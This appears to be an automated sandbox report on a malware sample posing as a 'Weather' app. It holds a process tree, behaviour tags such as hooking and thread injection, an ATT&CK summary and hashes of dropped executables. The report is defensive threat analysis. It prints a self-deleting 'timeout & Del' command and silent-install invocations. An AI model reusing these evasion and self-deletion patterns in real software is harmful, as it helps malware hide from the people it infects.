C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --mojo-platform-channel-handle=2092 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --mojo-platform-channel-handle=2888 /prefetch:85⤵
- Checks computer location settings
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2676 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --mojo-platform-channel-handle=1760 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1712 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2700 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --mojo-platform-channel-handle=3332 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --mojo-platform-channel-handle=2692 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --mojo-platform-channel-handle=3004 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,14849130639434560602,2170567403165347988,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4956_693496414" --mojo-platform-channel-handle=2748 /prefetch:85⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEF087.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEF087.bat"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEF087.bat" "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEEE54.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEEE54.bat"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEEE54.bat" "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2ff62b3c-09f3-2f4b-bb08-e646d8919a69}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\C247.exeC:\Users\Admin\AppData\Local\Temp\C247.exe1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\C536.exeC:\Users\Admin\AppData\Local\Temp\C536.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\D10E.exeC:\Users\Admin\AppData\Local\Temp\D10E.exe1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D10E.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\DD06.exeC:\Users\Admin\AppData\Local\Temp\DD06.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E498.exeC:\Users\Admin\AppData\Local\Temp\E498.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1302260226.exe"C:\Users\Admin\AppData\Local\Temp\1302260226.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\764823507.exe"C:\Users\Admin\AppData\Local\Temp\764823507.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\764823507.exe"C:\Users\Admin\AppData\Local\Temp\764823507.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\EB21.exeC:\Users\Admin\AppData\Local\Temp\EB21.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\EB21.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EDF1.exeC:\Users\Admin\AppData\Local\Temp\EDF1.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4728 -s 15042⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\5919bf4c0c2a419f89d7ecb0de64e9f1 /t 7004 /p 54561⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\4da1f99e2aa94b0b857248e22f5fdfbe /t 7764 /p 36041⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MQRKM.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-MQRKM.tmp\vict.tmp" /SL5="$2069A,870426,780800,C:\Users\Admin\AppData\Local\Temp\hzce4thi24b\vict.exe" /VERYSILENT /id=5351⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-DC5KM.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-DC5KM.tmp\win1host.exe" 5352⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\e014a36964eb48aa9f6f4e7037a83360 /t 8504 /p 44561⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\3925577b51ea4f2caa7573c8acddbc79 /t 0 /p 92681⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2784 -s 28042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Modify Registry
4Install Root Certificate
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exeMD5
faf344c2d45295018e26d52841bee13b
SHA1dd023af55e2089c3ec04a36c8aa03a7fe3a11f45
SHA2562f9c8e775cbddc92532180a38b561b5b4348b2f3e21235cd59154182556576e2
SHA5122b548f25c20fe54c9009f2f3c8b321a442f25e6176a388bfb1ecd727d700ec4a16306c29bd1bbceb6b96ec8a6600e15526e68eb9317e173540e010f573c22ac6
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exeMD5
faf344c2d45295018e26d52841bee13b
SHA1dd023af55e2089c3ec04a36c8aa03a7fe3a11f45
SHA2562f9c8e775cbddc92532180a38b561b5b4348b2f3e21235cd59154182556576e2
SHA5122b548f25c20fe54c9009f2f3c8b321a442f25e6176a388bfb1ecd727d700ec4a16306c29bd1bbceb6b96ec8a6600e15526e68eb9317e173540e010f573c22ac6
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exeMD5
d5c41bfd9555c8270a0a7536451c9498
SHA16d00d21d54bf59795e3cc78a83933cab9ad69cba
SHA256b635166bd7034c9e81ad713729847a71589e2e3d261abfeb63337eeddf849fd8
SHA51297d75e8149c21abf942fa67e66ea9bb8d0c12ee716adce07b7cab95af263393778b51b28863db9db4caee3476c84d76f47385a600a98cd80efdf5239448a7e17
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exeMD5
d5c41bfd9555c8270a0a7536451c9498
SHA16d00d21d54bf59795e3cc78a83933cab9ad69cba
SHA256b635166bd7034c9e81ad713729847a71589e2e3d261abfeb63337eeddf849fd8
SHA51297d75e8149c21abf942fa67e66ea9bb8d0c12ee716adce07b7cab95af263393778b51b28863db9db4caee3476c84d76f47385a600a98cd80efdf5239448a7e17
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exeMD5
b01439fde9fa8bfa29f51eede2ae3d0c
SHA1e0dd124e4302efd9966262febd26909421ef7eb3
SHA2567789349eb5a96b2b4048148a1361a3327e369646ca520115d390323bdc556d50
SHA51243a37fff0e61da074f272b930a11798d5eebd717a25aefbb1c2fc8dfc85aba650c7d9062bcd750cd4c436e8aff9f3b953cdd5ab909aee963716aec485543882f
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exeMD5
b01439fde9fa8bfa29f51eede2ae3d0c
SHA1e0dd124e4302efd9966262febd26909421ef7eb3
SHA2567789349eb5a96b2b4048148a1361a3327e369646ca520115d390323bdc556d50
SHA51243a37fff0e61da074f272b930a11798d5eebd717a25aefbb1c2fc8dfc85aba650c7d9062bcd750cd4c436e8aff9f3b953cdd5ab909aee963716aec485543882f
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exeMD5
8c51097d8b218a244265771b5c1ef69b
SHA1662bfbd385a6242a784dd33461a54e681f99c8e8
SHA256eba5bc17720c7c1da211e6fbb23b69a8e4ce3cd44f05338dc2f2bfe0527fea16
SHA51203cc62a4df8c60501699c2fde528f0beb4ac6b504cf734c712274fc279fa66a9572ad4e0ae3bf10916223f7768995d9318cf7e29b58405287f19fb2a2aa51089
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exeMD5
8c51097d8b218a244265771b5c1ef69b
SHA1662bfbd385a6242a784dd33461a54e681f99c8e8
SHA256eba5bc17720c7c1da211e6fbb23b69a8e4ce3cd44f05338dc2f2bfe0527fea16
SHA51203cc62a4df8c60501699c2fde528f0beb4ac6b504cf734c712274fc279fa66a9572ad4e0ae3bf10916223f7768995d9318cf7e29b58405287f19fb2a2aa51089
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exeMD5
8a0ade52ec2d728ad8bbf614904e337e
SHA1693c51f25d5210df2d76c019f758c6a93577a035
SHA256116da037fcfb6456bf6561b4a1112c55b13cd18a2ca35689f519f614c5cff2eb
SHA5120e239ec9107f83809ac9c5f69bd2378209275afedf10b027ef239043e7331c88e4f70785e52312d8c8375b5f57c4cd785650ace708bcc7f21fe05844d34ac747
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exeMD5
8a0ade52ec2d728ad8bbf614904e337e
SHA1693c51f25d5210df2d76c019f758c6a93577a035
SHA256116da037fcfb6456bf6561b4a1112c55b13cd18a2ca35689f519f614c5cff2eb
SHA5120e239ec9107f83809ac9c5f69bd2378209275afedf10b027ef239043e7331c88e4f70785e52312d8c8375b5f57c4cd785650ace708bcc7f21fe05844d34ac747
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exeMD5
300955d4464b65c8e70e69aed0d349c4
SHA15c3c55482549c07d3be6f52f92291bdcec365465
SHA256483d120901c099b3004dd2b287e3f376cd0a70ba60ad173c6fdc964a19f5c242
SHA512a8ae18177f4331a2e7e404e9ebf3d4b341a16b77759cc0bd3a694320449c55973f6b7985f50a17fc7f8d83ba3ef57c26f4b0db144a05d098a161073efc7725f9
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exeMD5
300955d4464b65c8e70e69aed0d349c4
SHA15c3c55482549c07d3be6f52f92291bdcec365465
SHA256483d120901c099b3004dd2b287e3f376cd0a70ba60ad173c6fdc964a19f5c242
SHA512a8ae18177f4331a2e7e404e9ebf3d4b341a16b77759cc0bd3a694320449c55973f6b7985f50a17fc7f8d83ba3ef57c26f4b0db144a05d098a161073efc7725f9
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exeMD5
a626587512314e2bb52000e376fd00a0
SHA1ca0da1e0ff1aaa94731a252f2f3a7afe9e6a24ef
SHA25609561dc7327f636ddb1418801743d6d3ed055f049959fe06977667e5b71e1c50
SHA51244cc5b0b596e3a2dadbedc5396a00e8ebdea054d6aee7a5eff1f52c04e7b5caace6ceedd48611fd5b5928ad9059b3ef286e69dafb36ac865fe131d70f045cf3d
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exeMD5
a626587512314e2bb52000e376fd00a0
SHA1ca0da1e0ff1aaa94731a252f2f3a7afe9e6a24ef
SHA25609561dc7327f636ddb1418801743d6d3ed055f049959fe06977667e5b71e1c50
SHA51244cc5b0b596e3a2dadbedc5396a00e8ebdea054d6aee7a5eff1f52c04e7b5caace6ceedd48611fd5b5928ad9059b3ef286e69dafb36ac865fe131d70f045cf3d
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exeMD5
e8fefc7a1bf76df943d6d43962f2f486
SHA1d99c373dab301167bd0e4f1a4d2b1dcb3c32c7ac
SHA256df196b2615b4f23fd269f1d8dab0194a7a58cb2d6576c4056b8832b9fa6dcf16
SHA512b031cee26265c452872e70638b65941a5ec6777239827ad61098598767f4e0e2ce6d1438ddfc1d87785981b3dd203096dcf2c6066f020f4a1431b62ef3eb2f2e
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exeMD5
e8fefc7a1bf76df943d6d43962f2f486
SHA1d99c373dab301167bd0e4f1a4d2b1dcb3c32c7ac
SHA256df196b2615b4f23fd269f1d8dab0194a7a58cb2d6576c4056b8832b9fa6dcf16
SHA512b031cee26265c452872e70638b65941a5ec6777239827ad61098598767f4e0e2ce6d1438ddfc1d87785981b3dd203096dcf2c6066f020f4a1431b62ef3eb2f2e
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exeMD5
6d064e7f7508f39e1447b1877e87c254
SHA15a787009772d2c6172e54d4a2562bf33080b7a69
SHA2568f9b755f83a07e061ae70b4d16214e0a72d214b6c913971d0867ffbbe30dfb77
SHA5126695c2cd95322a571e26656ca094384681da535b0a5ca3040c42b70f07bad857f2b396e693349b1b1c5b62d8e22ac74aa499a7c644920b40956c87753d24e1fc
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exeMD5
6d064e7f7508f39e1447b1877e87c254
